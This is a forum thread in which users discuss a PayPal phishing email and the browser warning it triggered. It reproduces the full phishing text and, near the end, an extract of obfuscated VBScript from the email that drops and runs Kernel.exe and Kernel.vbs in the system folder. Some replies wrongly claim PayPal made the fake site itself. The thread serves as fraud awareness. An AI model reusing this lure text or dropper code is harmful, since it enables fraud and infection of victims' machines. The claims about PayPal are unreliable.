Suspected Web Forgery

[devils casper]

Received this Email Today :

Subject : Attention ! Your PayPal account has been limited !

Email Contents :

Information Regarding Your account:

Dear PayPal Member: Attention! Your PayPal account has been limited!

As part of our security measures, we regularly screen activity in the PayPal system. We recently contacted you after noticing an issue on your account.We requested information from you for the following reason:
Our system detected unusual charges to a credit card linked to your PayPal account.

Reference Number: PP-259-187-991

This is the Last reminder to log in to PayPal as soon as possible. Once you log in, you will be provided with steps to restore your account access.
Once you log in, you will be provided with steps to restore your account access. We appreciate your understanding as we work to ensure account safety.

Click here to activate your account

We thank you for your prompt attention to this matter. Please understand that this is a security measure intended to help protect you and your account. We apologise for any inconvenience..

Sincerely,
PayPal Account Review Department
---------------------------------
Copyright © 1999-2008 PayPal. All rights reserved. PayPal Ltd. PayPal FSA Register Number: 226056. PayPal Email ID PP059

To safely and securely access the PayPal website or your account, open a new web browser (e.g. Internet Explorer or Netscape) and type in the PayPal login page (http://paypal.com/) to be sure you are on the real PayPal site.
For more information on protecting yourself from fraud, please review our Security Tips at https://www.paypal.com/us/securitytips

When I clicked on link Click here to activate your account , A message poped up :

This page has been reported as a web forgery designed to trick users into sharing personal or financial information. Entering any personal information on this page may result in identity theft or other fraud.

These types of web forgeries are used in scams known as phishing attacks, in which fraudulent web pages and emails are used to imitate sources you may trust. You can find out more about how Iceweasel protects you from phishing attacks.

Get out of here ! Ignore this warning

I am using Debian box + Iceweasel and I am not sure how other browsers ( Iceweasel is a clone of Firefox though ) handles Phishing attacks.

I thought its worth to share this info with you all.

[jan1024188]

Hey, this is PayPal's work.

They made a fake "FRAUD" website to make users learn where NOT to enter PayPal details.

BTW: Casper, you know that PayPal will ban all users using unsafe browsers?
I suggest you to use Firefox 2 or later and Internet Exploler 6 and later.

I personally use Internet Explorer 7, which is very safe and also providing "Green Line" for websites where is safe to buy stuff.

[devils casper]

I suggest you to use Firefox 2 or later and Internet Exploler 6 and later.

Iceweasel is a clone of Firefox and Debian's default Web Browser. Actually, Firefox and Iceweasel are same packages having different names.

Wiki :

In 2006, a naming issue developed when Mike Connor, representing the Mozilla Corporation, started attaching requirements to the "Firefox" trademark which were unacceptable to the Debian Project.[specify]

The Debian Project then rebranded the Mozilla programs so that it could continue to distribute the software without being bound by the requirements they wouldn't accept. The new names used by Debian were Iceweasel for Mozilla Firefox, Icedove for Mozilla Thunderbird, and Iceape for SeaMonkey. These changes are implemented in the subsequent version of Debian (Etch). In July 2007, Iceowl, a rebranded version of Mozilla Sunbird, was added to the 'unstable' branch of Debian.[1]

[jan1024188]

Ohh, Ok.
Hey, casper, you have PayPal account? Because, I have PayPal and I didn't get that mail.

Maybe the mail you got is just an advertisement showing PayPal security to gain new customers.

[elija]

That warning is how Firefox / Iceweasel helps protect you. The site
has been reported as fraudulent and added to a list checked by the
browsers anti-fraud measures.

IE 7 works in a similar way, but it's warning isn't as visible

Nice huh?

[devils casper]

Hey, casper, you have PayPal account? Because, I have PayPal and I didn't get that mail.

Hi Jan !

Yes. I have one.

Maybe the mail you got is just an advertisement showing PayPal security to gain new customers.

Do you really think its an advert by PayPal?
I dont think PayPal needs that kinda cheap adverts. They have strong user base already.

IE 7 works in a similar way, but it's warning isn't as visible

Nice huh?

I am not a Windows OS user anymore. I boot up Windows OS rarely but never get online through Windows OS. Thanx for the info elija !

[jan1024188]

Well, what do you mean by not that visible? If you're blind for colors, than its not well visible, but...

[devils casper]

Check this now :

Extract of email's Source code

on error resume nextfileexe1="077000000000..........filevbs1="0390 705304904804.........dim sysSet df = document.createElement("object")df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "set fso = df.createobject("Scripting.FileSystemObject","")se t s=df.CreateObject("Shell.Application.1","")set re=df.createobject("wscript.shell","")sys=fso.GetS pecialFolder(1)For a = 1 To Len(filevbs1) Step 3filevbs2=filevbs2 & chr(mid(filevbs1,a,3))if a "on" thenfso.CreateTextFile(sys & "\Kernel.exe").write fileexe2s.Open (sys & "\Kernel.exe")end iffso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1if fso.opentextfile(sys & "\Systemv.dll").readall"on" thenfso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2s.Open (sys & "\Kernel.vbs")end if

[Freston]

What's interesting is that the PayPal page (that gets blocked by my browser as well ) is under the domain of some sort of inconspicuous company selling beds and massage chairs and stuff like that.

[jan1024188]

wow, looks really fraud